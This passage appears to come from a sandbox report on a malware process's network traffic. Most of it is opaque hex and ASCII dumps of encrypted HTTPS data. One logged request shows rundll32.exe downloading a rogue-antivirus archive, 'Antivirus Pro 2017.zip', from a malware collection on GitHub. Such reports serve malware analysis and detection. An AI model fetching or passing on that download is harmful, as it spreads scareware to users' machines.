                                                                                                                                                    2022-09-29 12:59:05 UTC9582INData Raw: cf 0a c7 61 8b 7e f0 ad 10 52 5a b4 ac 0d ca 63 2d 81 bc 79 32 17 59 e6 0f 46 78 52 87 e3 2f 6a 3a 3c 88 b0 9a d5 0b 04 dc 1c 87 ba ee c5 1a 22 89 6a 7e 69 be 58 c6 e4 5e f1 f1 c3 6d b1 45 7f b4 97 d7 d3 be 21 b3 c0 66 5f 20 03 1e bb 11 ee a4 ad 6a 06 65 9c 1c f0 95 e9 c4 a4 0e ae 51 ab 57 dc 98 44 ac 7b c3 65 d6 4a 0d 96 77 78 54 b2 f3 5e da d9 35 09 7e fe 1f 19 69 ed 8c d9 60 de 6b 26 d6 f0 95 88 4d 1f 6e dc aa 05 a9 ef 98 58 ca 8c dd fa d2 7c 23 1b 9c 1a d1 da 86 41 27 d2 7a b2 a0 87 47 cb 78 53 67 35 09 d3 73 4b 6c 1c 16 af d1 a1 ad 0b 14 19 6d 53 8c 8a 86 65 a6 fb 2b 9f 09 e4 4f 28 98 dd 33 79 ab db 11 82 e6 89 61 b8 9c c2 a6 db 92 ce 40 54 21 29 d0 6d e6 19 a0 14 9e 74 78 33 7b f4 42 5f ef 70 60 8c e2 2d 7b f4 59 2c cb 5b c1 df 69 44 61 8b 5d 22 29
                                                                                                                                                    Data Ascii: a~RZc-y2YFxR/j:<"j~iX^mE!f_ jeQWD{eJwxT^5~i`k&MnX|#A'zGxSg5sKlmSe+O(3ya@T!)mtx3{B_p`-{Y,[iDa]")
                                                                                                                                                    2022-09-29 12:59:05 UTC9598INData Raw: 66 c7 34 b5 43 e3 bc 74 8f de 58 99 aa 3c d6 08 28 04 e6 e2 49 3d ff 4a 83 42 f1 d9 df 10 6d e9 94 85 58 96 4b 18 ce 03 bc 46 ba 36 0c 23 b4 49 e9 56 04 5e 99 a8 fa 05 19 a2 1c 29 eb 03 7f 72 53 28 88 46 b8 77 62 6f b6 36 20 83 2e 5b 81 f4 fc f4 90 b1 dc dd 67 3a 64 0c 79 43 36 d1 65 ab 12 78 fa 18 b8 7d 70 2a cd d3 43 77 b0 fb 3b ce 4f c0 82 28 25 65 16 fc d3 e4 bc cf 90 db 53 15 46 a6 79 c3 72 2a 69 ec ae a4 23 61 e1 d1 ef f6 f6 47 90 f8 99 ee 7c f9 38 35 36 e8 99 b7 cb f7 c8 21 84 d9 7e a0 9a 2e 00 83 b6 8c 9a 0d b1 74 9b bd 29 0d 80 1b 53 1f 25 0a 87 62 07 3f 18 41 4f d2 26 b2 45 19 93 6f 91 f0 19 a0 c6 5d de d5 32 82 f6 49 b5 d6 25 bc cc dc 30 5f 2a 6e e3 cb b5 be 5a 13 14 61 95 63 f0 a7 24 43 c4 be 84 8f 99 71 56 de 68 48 2d 45 6f 0c 6d 26 ad 7f 4c
                                                                                                                                                    Data Ascii: f4CtX<(I=JBmXKF6#IV^)rS(Fwbo6 .[g:dyC6ex}p*Cw;O(%eSFyr*i#aG|856!~.t)S%b?AO&Eo]2I%0_*nZac$CqVhH-Eom&L
                                                                                                                                                    2022-09-29 12:59:05 UTC9614INData Raw: 7c 1c 05 6f 74 47 a1 b9 74 58 9b f9 84 50 76 d2 89 18 ae 77 b2 09 ce 9f 0c a8 5b e4 a0 ed 91 eb 16 d9 04 c1 e2 90 8e 3a 1f d8 38 67 5e c5 e6 85 90 eb 4f 2b f6 8b ac 53 10 c8 68 96 22 7d e5 5d 6c 2c 76 fe 31 8c 9f 05 f6 2f 35 71 8a e7 fa 47 c1 9b 25 42 b2 41 8f c1 27 3c 0e 5a a5 f2 9e 2f 71 40 0b 7f f7 45 7a f9 b1 e7 b0 e4 43 9b 85 66 5f cb db 5a 0b a9 70 51 12 bd 43 93 77 7f 6f 6f b8 32 31 96 df d5 ee 85 63 88 e7 ae 33 1c f5 ce 90 5c 8d bb fd 1d 3f 58 d8 81 73 82 0b 62 a4 d2 90 e5 09 f3 ca 95 c0 01 85 4a 8d 7a 39 ca e6 6c b6 86 2c d8 a1 25 83 bc 69 29 8f 5c d3 b6 fd 5c ca 60 96 1f f3 48 aa 65 35 7d a7 27 ea ae c8 9f 23 a1 de 16 8f e4 62 0a 9a 00 36 af f1 6f da 45 46 dc 7f ac f7 1e 1f 3a 1b f5 06 25 ac 13 4c 1c f0 4a 60 99 b9 a8 60 27 48 79 26 b3 75 f8 68
                                                                                                                                                    Data Ascii: |otGtXPvw[:8g^O+Sh"}]l,v1/5qG%BA'<Z/q@EzCf_ZpQCwoo21c3\?XsbJz9l,%i)\\`He5}'#b6oEF:%LJ``'Hy&uh
                                                                                                                                                    2022-09-29 12:59:05 UTC9630INData Raw: 59 a2 ce 60 72 4a 74 b9 56 b9 97 c5 7c 24 80 6e f3 ad 0d e1 b2 1b e2 5f ce f8 43 14 19 a6 86 f0 ce d0 fe f3 42 99 93 5a 62 79 1d 10 71 4f 19 87 a1 6d 0b 25 b2 25 26 75 32 df b9 c6 9c 05 e1 c6 d7 e0 f8 41 e0 3e c8 9b 82 d0 7a 23 21 cf fa 33 22 63 71 28 98 f6 30 44 7f 09 4f 7e 7b cc e8 7f a9 21 50 ca 2c 36 15 ab 08 f7 c9 d4 33 74 75 ca b3 16 c9 11 0c d2 55 fe 4c d4 37 4a 1c a0 98 30 11 a0 75 f0 67 54 42 a6 34 ba 01 57 a1 83 ac eb f0 53 7c a1 53 c7 e0 06 82 0e e2 b5 70 ac e7 eb 0d 2c d9 a8 63 39 97 95 69 71 23 44 5f f5 33 bf 16 5e 2a c0 a7 dc 68 50 d1 c5 98 22 6a c0 d5 f4 c6 d0 0d de 54 85 dc 6f 5c 38 e2 4a 32 33 fa e7 d3 ac 43 c4 cf 05 b4 bd cc 0a 3e e8 36 05 37 be 8e 55 50 7c 3e 95 dc 76 2b 4d ba 1a ce 23 12 7d 9b e3 07 8a 67 6a 6a 42 fb db f4 c5 f7 71 02
                                                                                                                                                    Data Ascii: Y`rJtV|$n_CBZbyqOm%%&u2A>z#!3"cq(0DO~{!P,63tuUL7J0ugTB4WS|Sp,c9iq#D_3^*hP"jTo\8J23C>67UP|>v+M#}gjjBq
                                                                                                                                                    2022-09-29 12:59:05 UTC9646INData Raw: 54 76 07 c2 21 f0 10 f2 e0 a3 f1 c7 de 94 3e a4 ea 07 d2 85 98 78 99 41 30 dd 5e f6 f1 4f 57 bc e5 1c 05 63 c5 9a a0 88 28 50 e2 19 8f f6 1a 1f c0 1b 84 dc 75 4d 20 0e 75 22 d3 16 25 be 3f da f5 ac 5d 4b ef 4d 96 4e 29 59 5b ab 94 b7 7f 4f af 1d af bf 9e ef 99 90 23 1c 48 08 08 ef 6b 06 3e 00 05 ad f7 5d d5 d6 56 43 bc 8f f3 03 30 17 d9 9d da 16 b0 a2 cd 51 99 66 f6 4a 2b 78 66 ab 5b be 7a 11 26 7f dc d8 62 17 43 2e fb 04 74 e6 a7 d7 ce a7 91 da 3f 79 bf ec e2 1d 9e 7e 0b bd 55 45 c6 79 e3 8a 46 68 10 32 1a 14 26 6f a7 53 46 59 80 03 3c 64 cf 07 22 91 57 be 80 f1 1c 60 ec c4 c8 94 2b b1 65 69 78 c0 82 d5 7a b0 70 05 2b c2 89 53 10 9c c5 78 6a 11 a2 d7 a2 81 10 1d 30 1c d4 1a c6 07 28 cb 9f 8c 15 7a 58 4d 63 36 20 54 a6 d3 8a e5 33 ba 79 b9 09 06 a6 b1 1e
                                                                                                                                                    Data Ascii: Tv!>xA0^OWc(PuM u"%?]KMN)Y[O#Hk>]VC0QfJ+xf[z&bC.t?y~UEyFh2&oSFY<d"W`+eixzp+Sxj0(zXMc6 T3y
                                                                                                                                                    2022-09-29 12:59:05 UTC9662INData Raw: 17 88 5d a6 59 f7 4d 71 b2 8d 0d 62 04 26 6b 04 21 24 06 d1 eb 0b 29 e1 a4 be 58 40 64 ca 1c 90 18 58 58 71 f5 7f a0 b6 9c ac 62 cd 0c 48 0c 26 a0 4a 96 b3 52 d8 e9 0e 39 e6 4e 9f f9 64 e7 36 51 57 43 60 8d 37 9e ea a1 bd 35 99 92 ed 67 0a b0 d3 f0 36 b0 18 49 48 97 e2 d6 53 cb bd e9 77 09 ad 9d 53 a9 9d e6 83 2c 6a be 95 cd cf 48 93 23 5d 83 40 2e 29 73 be 55 59 f2 78 30 7c d4 53 1f a0 c0 5c ec 34 02 c9 ee fc a5 f9 49 b8 9c 41 89 c8 ba 67 17 4c 0e 0a eb ec 7b 62 f0 68 de 59 86 81 90 c8 1f 8d bd d5 15 af e8 77 49 02 7b 8f c8 de 00 50 fc 01 85 40 4e bf 04 db 45 71 4f f8 40 3d cf 9e 6f e9 94 ab ca 10 1d 44 fa 5e 89 82 08 cb 01 f1 32 48 92 ce 2c 10 a2 2e 22 be 8a 1d 2d 78 f9 15 a7 86 9d 60 d4 6a 6c 78 04 8b 27 42 e1 ac f3 1e 8b 90 16 da ac fd 85 ee c5 30 7c
                                                                                                                                                    Data Ascii: ]YMqb&k!$)X@dXXqbH&JR9Nd6QWC`75g6IHSwS,jH#]@.)sUYx0|S\4IAgL{bhYwI{P@NEqO@=oD^2H,."-x`jlx'B0|
                                                                                                                                                    2022-09-29 12:59:05 UTC9678INData Raw: 40 10 d6 92 92 f6 a3 31 4e 93 88 20 65 c2 e2 9a 20 2f 6e f1 f4 d3 b3 e9 c9 70 23 4d d2 46 61 71 48 dc 92 6d 78 d7 ed 72 73 43 24 b4 99 5e e8 a4 3d 3d c5 5b df 1c 67 34 8a 02 e7 64 25 16 36 ca 73 f1 43 6a 3c c0 35 09 d8 4b 60 ad 68 e6 ed 5f 03 2e 41 e7 80 5f 4f 43 fe b0 32 76 62 c9 74 be df e9 79 12 91 40 b8 d5 66 8f e0 43 1b c4 a8 4f 9d d6 f7 05 55 5d 5e 39 b7 90 c1 88 a4 f3 43 c7 90 c8 c7 4f 6f e2 32 27 95 ba 9a 35 63 df 77 4e 4f 2b 81 28 c3 a9 e2 3d 51 43 58 05 f8 51 c2 64 66 b9 49 a4 00 77 cd 50 14 6c 7a a6 55 10 d2 eb 1c 73 0d 47 07 dc a2 a7 69 63 6f d5 13 35 a3 d6 4c 88 c6 c2 de aa a0 5b 37 b9 fd 0b a6 6d a0 a6 a9 24 61 c9 a0 f1 63 66 83 12 5b da d4 6d 4d de f3 14 3b f7 03 31 68 a1 f8 21 76 4c 88 93 35 84 43 52 03 c5 9b b6 b1 b0 3d ae 9d 94 ed 6e cb
                                                                                                                                                    Data Ascii: @1N e /np#MFaqHmxrsC$^==[g4d%6sCj<5K`h_.A_OC2vbty@fCOU]^9COo2'5cwNO+(=QCXQdfIwPlzUsGico5L[7m$acf[mM;1h!vL5CR=n
                                                                                                                                                    2022-09-29 12:59:05 UTC9694INData Raw: 40 bb a6 5b eb 36 57 a9 2a 72 47 13 13 0d dc 6f 9f 39 11 21 43 d0 70 b7 d2 b3 91 94 fd 42 35 f9 f1 35 bf df 5a 19 74 1b a2 75 7c 69 e2 5b 1b 9f 71 76 cd 61 e7 9c cb 5c ef 61 f8 d0 ba d0 e9 2e bb c7 98 8f 07 3e 73 25 a3 57 b1 81 10 e2 ac cd c9 a7 de 96 d3 24 90 60 6b ce e9 f5 67 cd 7d b9 85 d3 14 09 7c 82 21 9b 8e 0b e9 68 89 d2 c6 7c b4 67 97 23 78 5f cf a6 29 87 a3 a7 50 3a 89 eb 83 86 ec 2e 6b 15 5a 4c 12 d4 7d 2d f7 af bf e1 a9 f3 84 cc 44 78 ee f1 54 89 6c 18 9a 82 55 20 00 cc 18 ed de 83 4c 64 46 23 98 6c 07 69 8a dc a9 01 1e a4 42 d7 a2 e1 c5 3d 0d 01 2f 32 89 79 cb 15 46 a5 96 a3 f6 95 ce e1 e9 10 de 4a b3 8a 90 01 bb 9d c3 0f c9 d8 0d 45 dc 04 a5 d9 a1 ce 67 84 92 9e 37 3a 90 ae 30 b7 58 5a 0f a9 92 44 8c a2 8e 4d 45 e2 67 c9 50 77 6d 88 89 d2 4e
                                                                                                                                                    Data Ascii: @[6W*rGo9!CpB55Ztu|i[qva\a.>s%W$`kg}|!h|g#x_)P:.kZL}-DxTlU LdF#liB=/2yFJEg7:0XZDMEgPwmN
                                                                                                                                                    2022-09-29 12:59:05 UTC9710INData Raw: c7 a9 1c 5e 70 ff b5 88 8a 48 6d e9 12 e0 6b ac 24 2d 7a 48 53 4a 25 49 c8 cf b3 fa 19 43 a2 09 a4 03 cc 17 92 93 69 84 9e 67 80 1e be 73 c8 fd e6 c4 e5 9a c5 2b e9 10 6c 01 da 96 91 c4 9a 8e a6 9f c8 3c 34 ca 6a 29 7b ae 0b 0c 77 9f ca c7 87 25 ce ee e1 0e d3 28 cb 1d 07 ac 91 d6 1f ec 99 c2 64 c3 5e d8 8d 36 42 18 a1 bd 1b 63 4f 2c 64 fe 42 c4 c9 97 28 ab 7b 72 e7 b2 be c6 53 b8 e8 dd 61 f2 6a ee 9a 0e 42 ad 6a 50 c1 77 99 38 be d6 25 a9 5b 50 22 e5 d4 bb db 7b d8 3c 02 c0 72 a1 9f 67 b3 39 57 ce db 2e d2 87 8a 72 c8 08 f3 06 4a 3f 6e b2 ee b1 3d e5 3e 35 85 02 f8 04 0d 6b db c9 12 0f 0b 63 8a ca 13 8f c1 c8 bc 96 a7 b2 21 0c 73 07 f6 7a ea 12 81 0c ed e2 42 79 a5 e7 bf fb 53 ff 1f 81 99 e9 7c 36 eb 68 13 e4 08 72 ad 8f a3 f0 39 0c f9 d2 e7 c4 f2 f4 d8
                                                                                                                                                    Data Ascii: ^pHmk$-zHSJ%ICigs+l<4j){w%(d^6BcO,dB({rSajBjPw8%[P"{<rg9W.rJ?n=>5kc!szByS|6hr9
                                                                                                                                                    2022-09-29 12:59:05 UTC9726INData Raw: f7 fd c5 c6 c2 99 7e 61 b0 82 15 1c 77 c7 ea 6f 18 69 52 15 76 2c 10 e1 48 e0 24 a4 0d e9 47 9f c2 e8 94 c4 1d d7 5c fa 36 76 a3 29 38 c4 09 6b cd 0c 04 a8 8c c8 52 ad 49 2e 06 2a 66 ce 7f 83 b0 db 8e d8 21 fc 45 c9 98 9e 41 c6 b9 ff c6 40 cf 98 67 d7 c0 d4 26 25 0e d2 b7 79 46 e0 57 a4 25 42 84 a1 5a 49 05 0a 31 d5 06 e5 a8 bb 57 70 1c 36 f5 7e 2d 46 79 80 b6 7f eb c7 de 41 17 19 de 21 6d 36 1c 57 70 8e f0 12 9c dd 75 12 d3 ce e6 06 ae e3 cd 76 b8 01 46 a8 f6 ab 66 19 7e 2f 26 45 b6 83 c1 94 aa 06 ad 93 dd 55 2a 5c b9 f4 34 a2 6a c3 05 22 af 17 49 d1 e4 09 c7 5b 42 f4 a4 5f fe b5 7a 08 c5 2c 5e b6 11 5b c3 7f 55 fc 28 ee 7c 89 0a 28 03 58 82 b4 f9 8d ef fb ab 51 92 d6 37 a2 ae 37 d8 de 69 5f 3e 6e c9 cb 01 34 cb 21 d7 54 ed 23 e0 cd 4b fd 8b b7 56 59 40
                                                                                                                                                    Data Ascii: ~awoiRv,H$G\6v)8kRI.*f!EA@g&%yFW%BZI1Wp6~-FyA!m6WpuvFf~/&EU*\4j"I[B_z,^[U(|(XQ77i_>n4!T#KVY@
                                                                                                                                                    2022-09-29 12:59:05 UTC9742INData Raw: c5 d5 28 b6 ff ae c4 31 9f 3a 0a e9 85 e0 09 59 6f ee 05 54 f5 4c e9 cb 96 39 76 dc 7f 3a 8d c3 cb 5e 9a 9c 98 69 06 ae d3 08 e8 b8 b5 f9 dd ea 85 36 32 8a b1 c0 a6 ab 95 2b b6 09 6a ee 70 9c bb 04 bf 4b ed b9 5f 87 ee fb 73 fa bd 84 f8 8e 14 1e 04 9f 98 32 3c e3 c9 d6 e6 53 bb 56 5a fc cc 49 86 93 fd 55 82 42 09 0a 75 da 9a 67 a6 27 88 6c 82 01 ed 8e 7c 6b 7b b3 33 fd ca e3 4f 1f b4 96 2a 7d 3e 1d f7 40 05 34 74 fa 05 53 55 13 af c7 1e cb cb 7f 65 b0 1d e4 f2 82 64 e9 f0 f8 9c e4 ce 55 32 e4 60 e2 7f a7 8b b2 18 ca c6 f0 dd d8 9d 2f 6c 46 9f 1b 8f 4a 09 d5 90 30 23 b1 83 88 0a 3b 6d 48 79 6f 07 75 f1 04 45 68 14 f4 cf 25 8f 59 e1 af 94 8a 09 47 6e be 4e 9d cd 34 7b bb 1f 6c 96 26 d4 66 4f e8 8c eb 71 0f 47 2d 51 5c 86 0c 3d 1f b9 33 13 dd 2c 63 1c 55 8e
                                                                                                                                                    Data Ascii: (1:YoTL9v:^i62+jpK_s2<SVZIUBug'l|k{3O*}>@4tSUedU2`/lFJ0#;mHyouEh%YGnN4{l&fOqG-Q\=3,cU
                                                                                                                                                    2022-09-29 12:59:05 UTC9758INData Raw: 20 02 3a c1 52 48 36 73 88 37 04 bc 20 23 b1 b4 54 20 ef ea 16 62 1f 0b 6d 6e 9b ae 3e 40 dc 09 f6 de 51 47 cb f8 84 c4 fa fd 4b 16 62 3e a9 b0 ac d8 99 71 a5 ed 55 0e 45 b3 1c 3c ed d4 c6 da 8d c7 9e 40 82 c4 5e e9 d5 46 a1 1f ec fe 44 39 a5 a8 d9 5c 59 cd 5b e5 05 56 83 48 35 fb 58 03 0c b9 cb 83 0a 18 1b 83 33 31 c4 45 3b 2b bc 1c c2 4a 39 98 32 dc a8 c6 11 01 0e e6 86 b9 55 bb ad 64 b9 cf e1 2a 84 09 75 ff 61 5f 7d 70 51 ab 91 c5 04 52 31 90 cd 46 ef 72 63 93 6f 6a 16 9e e4 80 33 f4 1f 43 9e ee ce 50 00 3c 1b 5f 65 24 15 5a 1f 3e 94 9b 62 d6 b1 30 f6 c7 7b f3 20 cf 16 ea ad 64 af 17 a0 ad 60 8e 76 c1 d2 47 36 ea 66 63 a2 b3 3c 37 15 2c 48 9b 62 c2 e3 d4 65 d9 cf c7 cf dd ea f1 5a 51 8e 60 fb c4 86 6d ae f0 1d 0e ea c6 31 2f 01 fa 4a 2b 09 f4 91 2d 80
                                                                                                                                                    Data Ascii: :RH6s7 #T bmn>@QGKb>qUE<@^FD9\Y[VH5X31E;+J92Ud*ua_}pQR1Frcoj3CP<_e$Z>b0{ d`vG6fc<7,HbeZQ`m1/J+-
                                                                                                                                                    2022-09-29 12:59:05 UTC9774INData Raw: 58 34 d4 ae 2f db 7e 76 bc 43 55 a9 4b d7 3f 03 10 6d 0b b3 aa ab a5 a6 0c 1f 83 01 9f 4a aa bc 7d 94 a2 bb a2 14 53 92 96 55 e6 5c d8 72 09 5c a8 b9 f4 8a 84 fd 03 67 21 11 58 ff 7e b9 72 db 3d b5 58 77 8d 82 05 eb e5 bf c7 e4 c9 71 53 eb ea 45 ee e2 d0 ce 5a 23 bc 1d a5 18 9a 85 36 72 2e 08 f5 3b a5 88 10 4b 58 5d 65 69 a6 92 4c 72 94 11 4a af 9d 86 b8 24 38 73 f7 c5 6b 2c fd d9 a6 37 ab 27 c8 1e c1 00 3f d8 29 75 bb ff 99 f2 e4 b0 a7 21 5e 8c 2b 68 31 fa 73 12 33 59 bf 64 9b cd 80 e2 2e 73 5d 0b 75 09 61 f1 96 83 ca 6f b0 dd ca 32 50 17 af 8a 8a 44 86 b1 85 5f e2 1f 80 ea 61 11 eb 31 d3 55 77 cb 8a e7 3c 4c f2 69 86 d3 97 89 1e 32 3e e7 84 38 4b 25 e3 a5 c1 27 1e 3f c6 68 df 19 66 36 75 98 e8 16 72 a7 d0 a1 bb 88 e8 a7 2e 55 b8 e9 e3 4f 75 a2 13 d9 1a
                                                                                                                                                    Data Ascii: X4/~vCUK?mJ}SU\r\g!X~r=XwqSEZ#6r.;KX]eiLrJ$8sk,7'?)u!^+h1s3Yd.s]uao2PD_a1Uw<Li2>8K%'?hf6ur.UOu
                                                                                                                                                    2022-09-29 12:59:05 UTC9790INData Raw: 0b a2 63 b4 d2 02 d7 dc bf de 47 ab 74 a0 a5 34 80 a3 33 15 ef f7 1b cc 76 2c cc 79 3e d3 ac 4a 3a bc 5f ac bb 6b 85 1f d8 5a 9b a6 c0 f1 ca 12 11 1c 60 f4 a5 a7 96 70 89 c4 af bf 46 ce 5d 11 cf cc 35 dd a3 9f d4 bc 8a fa 6c e0 a6 24 d5 0a 01 fe 91 c1 ba 31 4f ef 9c 3e ab 05 ae 76 c6 e9 8e 8e 79 9f 28 ca 83 c9 20 a0 eb 22 14 29 f5 e4 7f 96 b0 c6 99 3b 64 e9 54 1e b5 0c a0 9b fe a9 de 53 2f 8c 89 ec 72 4b 91 b9 22 6a d5 46 93 9d 9e 50 fc 8b 7e c7 0a a7 d0 b0 17 ac b6 f5 09 c9 04 ba 78 59 d5 c1 30 05 96 53 4b 6b e2 5e 69 9b 3c 26 c6 c7 01 69 31 1e 99 ee eb 3c 2e 3e 6b 70 88 7a 3c 43 fc 3b 60 6c 93 1d 69 d0 f1 6b 52 97 a5 6f ee 0a fb 8a c5 63 e8 62 bd 3b ca 56 5d a9 ed 03 75 cd bd a1 eb 37 3c b5 b2 c5 b1 fb 4f 99 7d 57 3f 7e 82 2e 2b 4e dc ec d3 34 2c e9 86
                                                                                                                                                    Data Ascii: cGt43v,y>J:_kZ`pF]5l$1O>vy( ");dTS/rK"jFP~xY0SKk^i<&i1<.>kpz<C;`likRocb;V]u7<O}W?~.+N4,
                                                                                                                                                    2022-09-29 12:59:05 UTC9806INData Raw: ee ee 4f 6f 24 3e 24 69 b6 eb b5 06 0c e7 bb a3 58 c3 da cb 6b ca fa 33 f3 d7 b0 91 93 eb 7f cf 01 0b 58 8e 6e 1b cf 93 0c 59 12 9f 2d 57 ac 7f b6 59 bf 6d 5d 9d 53 a5 d0 69 82 a6 f5 ab 41 fe 91 90 61 8b ac f5 f6 8c 9f 57 4f 1d 58 dd b0 d1 5a 5c 6f 96 8d 48 67 24 8a e1 ea 38 8e 23 53 6c f5 40 2a 78 f8 d0 71 1d 89 f0 69 68 98 b5 f9 0a 23 ba 56 39 4a 1c 64 d8 a1 23 9d 2c db 70 33 e8 72 6c e4 b5 d6 39 32 aa dc 4a a9 77 30 33 a5 ca 8e f6 af 7d 57 e9 f3 a8 81 6f d4 2c 7d 58 25 74 48 68 da 85 10 e2 3d c4 85 22 2c d0 5c dc 60 ef 28 7f 2b 10 1d bb a2 3c d2 ec 95 07 4a e7 66 b4 cf 43 e5 5d 74 a5 02 08 68 fc 32 9b 57 d1 5c d3 0c 4b 4b b4 38 4c df 02 12 c8 47 e8 e7 be fe 63 79 4e 7c 1e a1 5e 63 01 26 96 c4 45 e8 45 e7 5e 42 20 59 7e 41 25 cd f5 50 fe 8d a6 ca a4 23
                                                                                                                                                    Data Ascii: Oo$>$iXk3XnY-WYm]SiAaWOXZ\oHg$8#Sl@*xqih#V9Jd#,p3rl92Jw03}Wo,}X%tHh=",\`(+<JfC]th2W\KK8LGcyN|^c&EE^B Y~A%P#
                                                                                                                                                    2022-09-29 12:59:05 UTC9822INData Raw: 9a f2 54 55 a8 c4 54 83 18 53 7d b9 49 44 72 17 40 85 3b a4 3f c9 cd af 38 82 6e fd 48 ee 30 80 94 60 1d 25 57 a4 61 9a 2c 7a 84 c4 be 10 fc bc 47 46 56 5d 90 f1 59 13 66 b3 3f 34 7f 54 e3 9b 1b 2a e2 1f fa b2 4c 58 21 7e a5 49 e1 7e 4c 18 e0 d3 74 28 89 65 5f 09 99 11 2c d9 6e 7a ce 11 8c f8 96 24 ed 0a bb e0 44 1e 79 17 49 f4 1e c8 15 20 dc b3 a8 2f d3 b8 8f b0 e5 5f dd 08 2b db 6c 88 79 5d 12 79 9f 0b 69 d5 56 bd bd 2c 29 c1 0f 39 c5 80 ba bd 63 c9 6b d3 11 63 73 8e 98 44 22 6c ad f1 02 0c 26 01 87 7a cb f3 97 f7 14 34 5b 2c 52 14 d8 85 9a d9 07 0a 79 14 8e 7e 9e ba bf e8 9f de 59 af d9 66 77 f0 e0 1a 2b ec ae e5 bf 82 9a 1e d7 94 f4 1e 51 67 83 f7 5e ed ab b9 d6 7a 7d 1f 9c b8 16 3a 9f 96 a4 d1 10 ee bc 16 1f 4d dd 69 20 60 72 6a b4 93 c6 62 1d 6b 6e
                                                                                                                                                    Data Ascii: TUTS}IDr@;?8nH0`%Wa,zGFV]Yf?4T*LX!~I~Lt(e_,nz$DyI /_+ly]yiV,)9ckcsD"l&z4[,Ry~Yfw+Qg^z}:Mi `rjbkn
                                                                                                                                                    2022-09-29 12:59:05 UTC9838INData Raw: 53 eb 67 1f bf 7e f8 24 75 4e a8 14 cc 41 04 85 11 f2 88 ef f7 9a 4e 38 db 59 09 d3 fd 97 e4 51 1e 96 69 ef 9e ff d9 0c fb bc 7e 9f 91 1c 6b f0 8d 73 37 f5 39 62 ee 26 45 e5 23 0c d9 ec df 27 c7 c3 bf 02 dc c5 50 7b d9 e1 39 ed 1a 5b 1f 48 c3 7d 14 55 fa c1 fc 04 af a8 5e 65 0f f4 7e e1 be af fb 99 28 32 be 33 c3 8c 9b fc 8a a4 e3 c5 5c f8 86 4e d7 f5 fc 9b bb 1c 83 59 f9 90 06 2f 40 04 d0 89 4a 66 fa 8d eb f2 5c f9 7b ef 73 be 7f 21 cd ae c7 1c 3d 14 1a 20 bf 48 49 cb 52 87 23 a6 29 9e 1d 70 9e e4 c8 20 b4 1a 51 b0 0e 43 b1 b3 f5 71 e4 50 21 dc e8 41 b5 ef 6a 41 57 e8 19 0f 34 44 73 85 8f 57 f2 8c db 31 52 ab 1d 66 08 d8 5f 2b 47 98 fe e2 b1 6b 29 d6 19 ed 38 71 c7 22 39 01 d7 55 81 de 97 5e e9 71 da 8b 37 c9 05 c6 c0 56 d2 64 dc 2c 8c 1a 1c f5 15 a9 80
                                                                                                                                                    Data Ascii: Sg~$uNAN8YQi~ks79b&E#'P{9[H}U^e~(23\NY/@Jf\{s!= HIR#)p QCqP!AjAW4DsW1Rf_+Gk)8q"9U^q7Vd,
                                                                                                                                                    2022-09-29 12:59:05 UTC9854INData Raw: 27 60 69 d4 bc 19 d1 50 17 0a 48 c6 71 e5 5d 0b 9d 83 42 3d 95 08 46 73 7d 03 e8 49 3e 0b 99 6e cf cb b9 3c a8 96 3b b3 6f ca 46 2b 88 b8 97 6d 2e d0 a1 e1 b4 fc a5 4e c3 84 6b c2 75 90 05 5e 39 da 76 76 d8 ff 17 4c 61 fc 86 ee 1f e3 38 bd f2 71 d8 03 31 e6 e0 6b 2e 15 a2 95 5c 39 90 38 1f 7f 79 48 d3 ab b2 e9 e5 1d 23 28 87 d5 9d 11 de 2b c9 9b 54 05 3c 4e 32 b9 d0 7a 9a 6d 99 fe 02 75 36 b8 9c d0 e2 f5 17 9a 90 6e e4 a0 e2 71 41 73 81 74 94 69 e9 f4 4b 2c ee d4 37 66 24 47 66 d9 a4 fa ab 6a 28 8b 61 c9 a2 27 b0 91 5d de 53 b1 1e 59 3c ec d0 f9 ca 38 fc ff 86 3e 28 c7 82 08 7b 9f da d1 ec 02 f4 ce d9 c6 f6 77 3f 45 9c b5 19 3c 2a ed ec b3 76 9d 37 5e d4 4c f7 44 99 20 2b 39 36 49 f4 0e 48 26 44 ec 0e ab 0b 65 ef bf 91 c9 d9 7b 60 58 57 a0 a0 63 8a e1 bc
                                                                                                                                                    Data Ascii: '`iPHq]B=Fs}I>n<;oF+m.Nku^9vvLa8q1k.\98yH#(+T<N2zmu6nqAstiK,7f$Gfj(a']SY<8>({w?E<*v7^LD +96IH&De{`XWc
                                                                                                                                                    2022-09-29 12:59:05 UTC9870INData Raw: 4a 5f 57 8d a0 1e 9b 2f 0a 1f 9e b3 f4 03 35 68 e2 ea 12 8d c6 e4 68 4f f0 d1 6f 44 fd 53 7d eb 4d 8a d2 b0 76 6a 04 8c 7d 05 ac c3 b9 63 84 3c be 6e 81 05 c5 e5 ad a8 a1 80 79 06 d2 d8 e0 9e 3a 0b 32 9b 46 90 cc 98 6c c5 11 30 bb 81 9d 28 d6 0a 1c 37 ed 60 c8 29 8b 40 07 7d 0d d9 cb 34 ca 5f 79 19 a2 1f 85 87 21 d3 66 ed bd 7f 67 33 f9 3c f6 c7 27 b3 e7 54 40 26 57 38 16 e1 3b c1 7a c8 68 42 ad 07 7f 1b fb af ae 33 8f 71 2f 5e 4a 14 b1 70 87 f8 3c ca 2a c4 3d ab d3 ca 7a ec 44 38 1f cd af 05 7a 78 d1 da ca db 9f 8c 98 b8 f1 86 f0 26 99 71 d9 0b e8 95 a8 5e e9 db 01 9d 77 ee 40 7a 4e 16 d3 86 88 d8 c8 43 13 51 03 75 4f ce e7 1f 70 b8 9e f2 10 20 cb 90 ab 7f b4 88 cd 44 64 fd ad fa 27 69 5b 76 ad c7 69 79 ab 7b a1 b2 47 c5 f5 87 1d ae c1 8f f3 f7 be 67 90
                                                                                                                                                    Data Ascii: J_W/5hhOoDS}Mvj}c<ny:2Fl0(7`)@}4_y!fg3<'T@&W8;zhB3q/^Jp<*=zD8zx&q^w@zNCQuOp Dd'i[viy{Gg


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    69192.168.2.349742140.82.121.3443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:05 UTC9872OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Pro%202017.zip HTTP/1.1
                                                                                                                                                    Host: github.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    7192.168.2.349711185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
